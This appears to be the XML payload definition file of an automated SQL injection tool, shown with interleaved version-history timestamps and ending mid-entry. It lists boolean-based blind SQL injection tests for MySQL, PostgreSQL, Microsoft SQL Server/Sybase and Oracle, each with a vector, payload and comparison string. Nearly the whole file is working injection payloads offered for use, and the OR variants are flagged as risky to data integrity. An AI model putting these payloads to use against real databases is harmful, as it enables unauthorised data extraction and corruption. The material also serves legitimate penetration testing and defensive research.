2015-02-18 13:13:44 +03:00
<?xml version="1.0" encoding="UTF-8"?>
<!--
Tag: <test >
SQL injection test definition.
Sub-tag: <title >
Title of the test.
Sub-tag: <stype >
SQL injection family type.
Valid values:
1: Boolean-based blind SQL injection
2: Error-based queries SQL injection
2015-02-20 21:34:23 +03:00
3: Inline queries SQL injection
2015-02-18 13:13:44 +03:00
4: Stacked queries SQL injection
5: Time-based blind SQL injection
2015-02-20 21:34:23 +03:00
6: UNION query SQL injection
2015-02-18 13:13:44 +03:00
Sub-tag: <level >
From which level check for this test.
Valid values:
1: Always (<100 r e q u e s t s )
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)
Sub-tag: <risk >
Likelihood of a payload to damage the data integrity.
Valid values:
1: Low risk
2: Medium risk
3: High risk
Sub-tag: <clause >
In which clause the payload can work.
NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.
Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
A comma separated list of these values is also possible.
Sub-tag: <where >
Where to add our '<prefix > <payload > <comment > <suffix > ' string.
Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string
Sub-tag: <vector >
The payload that will be used to exploit the injection point.
Sub-tag: <request >
What to inject for this test.
Sub-tag: <payload >
The payload to test for.
Sub-tag: <comment >
Comment to append to the payload, before the suffix.
Sub-tag: <char >
Character to use to bruteforce number of columns in UNION
query SQL injection tests.
Sub-tag: <columns >
Range of columns to test for in UNION query SQL injection
tests.
Sub-tag: <response >
How to identify if the injected payload succeeded.
Sub-tag: <comparison >
Perform a request with this string as the payload and compare
the response with the <payload > response. Apply the comparison
algorithm.
NOTE: useful to test for boolean-based blind SQL injections.
Sub-tag: <grep >
Regular expression to grep for in the response body.
NOTE: useful to test for error-based SQL injection.
Sub-tag: <time >
Time in seconds to wait before the response is returned.
NOTE: useful to test for time-based blind and stacked queries
SQL injections.
Sub-tag: <union >
Calls unionTest() function.
NOTE: useful to test for UNION query (inband) SQL injection.
Sub-tag: <details >
Which details can be infered if the payload succeed.
Sub-tags: <dbms >
What is the database management system (e.g. MySQL).
Sub-tags: <dbms_version >
What is the database management system version (e.g. 5.0.51).
Sub-tags: <os >
What is the database management system underlying operating
system.
<test >
<title > </title>
<stype > </stype>
<level > </level>
<risk > </risk>
<clause > </clause>
<where > </where>
<vector > </vector>
<request >
<payload > </payload>
<comment > </comment>
<char > </char>
<columns > </columns>
</request>
<response >
<comparison > </comparison>
<grep > </grep>
<time > </time>
<union > </union>
</response>
<details >
<dbms > </dbms>
<dbms_version > </dbms_version>
<os > </os>
</details>
</test>
-->
<root >
<!-- Boolean - based blind tests - WHERE/HAVING clause -->
<test >
<title > AND boolean-based blind - WHERE or HAVING clause</title>
<stype > 1</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
2015-02-20 21:34:23 +03:00
<test >
<title > OR boolean-based blind - WHERE or HAVING clause</title>
<stype > 1</stype>
<level > 1</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [INFERENCE]</vector>
<request >
<payload > OR [RANDNUM]=[RANDNUM]</payload>
</request>
<response >
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-02-19 19:42:26 +03:00
<title > AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-19 19:42:26 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
2015-10-22 15:47:19 +03:00
<comment > -- -</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
2015-02-20 21:34:23 +03:00
<test >
<title > OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype > 1</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [INFERENCE]</vector>
<request >
<payload > OR [RANDNUM]=[RANDNUM]</payload>
2015-10-22 15:47:19 +03:00
<comment > -- -</comment>
2015-02-20 21:34:23 +03:00
</request>
<response >
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-02-19 19:42:26 +03:00
<title > AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-19 19:42:26 +03:00
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
2015-02-19 19:42:26 +03:00
<comment > #</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
2015-02-19 19:42:26 +03:00
<details >
<dbms > MySQL</dbms>
</details>
2015-02-18 13:13:44 +03:00
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
2015-02-20 21:34:23 +03:00
<vector > OR [INFERENCE]</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > OR [RANDNUM]=[RANDNUM]</payload>
<comment > #</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
2015-02-18 13:13:44 +03:00
</response>
2015-02-20 21:34:23 +03:00
<details >
<dbms > MySQL</dbms>
</details>
2015-02-18 13:13:44 +03:00
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 3</level>
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1</clause>
2015-02-20 21:34:23 +03:00
<where > 1</where>
<vector > AND [INFERENCE]</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > AND [RANDNUM]=[RANDNUM]</payload>
<comment > %16</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
2015-02-18 13:13:44 +03:00
</response>
2015-02-20 21:34:23 +03:00
<details >
<dbms > Microsoft Access</dbms>
</details>
2015-02-18 13:13:44 +03:00
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
2015-02-20 21:34:23 +03:00
<vector > OR [INFERENCE]</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > OR [RANDNUM]=[RANDNUM]</payload>
<comment > %16</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
2015-02-18 13:13:44 +03:00
</response>
2015-02-19 19:42:26 +03:00
<details >
2015-02-20 21:34:23 +03:00
<dbms > Microsoft Access</dbms>
2015-02-19 19:42:26 +03:00
</details>
2015-02-18 13:13:44 +03:00
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 14:34:16 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
<request >
<payload > RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
</request>
<response >
<comparison > RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-02-20 14:34:16 +03:00
<test >
<title > MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request >
<payload > AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request >
<payload > OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND ELT([INFERENCE],[RANDNUM])</vector>
<request >
<payload > AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR ELT([INFERENCE],[RANDNUM])</vector>
<request >
<payload > OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND ([INFERENCE])*[RANDNUM]</vector>
<request >
<payload > AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response >
<comparison > AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-03-04 16:36:09 +03:00
2015-02-20 14:34:16 +03:00
<test >
<title > MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR ([INFERENCE])*[RANDNUM]</vector>
<request >
<payload > OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response >
<comparison > OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<!-- End of boolean - based blind tests - WHERE or HAVING clause -->
<!-- Boolean - based blind tests - Parameter replace -->
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL > = 5.0 boolean-based blind - Parameter replace</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 1</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2015-02-19 19:42:26 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2015-02-19 19:42:26 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
2015-02-19 19:42:26 +03:00
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > > = 5.0</dbms_version>
2015-02-19 19:42:26 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL > = 5.0 boolean-based blind - Parameter replace (original value)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > > = 5.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL < 5.0 boolean-based blind - Parameter replace</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2015-02-19 19:42:26 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2015-02-19 19:42:26 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
2015-02-19 19:42:26 +03:00
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > < 5.0</dbms_version>
2015-02-19 19:42:26 +03:00
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL < 5.0 boolean-based blind - Parameter replace (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 3</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > < 5.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-02-19 19:42:26 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > MAKE_SET([INFERENCE],[RANDNUM])</vector>
2015-02-19 19:42:26 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
2015-02-19 19:42:26 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
2015-02-19 19:42:26 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-19 19:42:26 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL boolean-based blind - Parameter replace (ELT)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > ELT([INFERENCE],[RANDNUM])</vector>
2015-02-20 14:34:16 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
2015-02-20 14:34:16 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
2015-02-20 14:34:16 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
2015-02-20 14:34:16 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-20 14:34:16 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > ELT([INFERENCE],[ORIGVALUE])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-02-20 14:34:16 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL boolean-based blind - Parameter replace (bool*int)</title>
2015-02-20 14:34:16 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-20 14:34:16 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > ([INFERENCE])*[RANDNUM]</vector>
2015-02-20 14:34:16 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
2015-02-20 14:34:16 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
2015-02-20 14:34:16 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-20 21:34:23 +03:00
<vector > ([INFERENCE])*[ORIGVALUE]</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:23 +03:00
<payload > ([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-20 21:34:23 +03:00
<comparison > ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2015-02-19 19:42:26 +03:00
<title > PostgreSQL boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
<request >
2015-02-20 14:34:16 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
2015-02-19 19:42:26 +03:00
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<request >
<payload > (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
</request>
<response >
<comparison > (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-20 14:34:16 +03:00
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
2015-02-19 19:42:26 +03:00
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,2,3</clause>
<where > 3</where>
2015-02-19 19:42:26 +03:00
<vector > (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:42:26 +03:00
<payload > (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-02-19 19:42:26 +03:00
<comparison > (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2015-02-20 14:34:16 +03:00
<title > Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-20 14:34:16 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-18 13:13:44 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
2015-02-20 14:34:16 +03:00
<title > Oracle boolean-based blind - Parameter replace</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-20 14:34:16 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
